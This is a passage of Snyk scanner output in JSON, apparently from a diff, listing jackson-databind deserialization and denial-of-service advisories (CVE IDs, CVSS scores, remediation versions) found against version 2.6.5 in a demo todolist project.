dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": "0.00415", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub 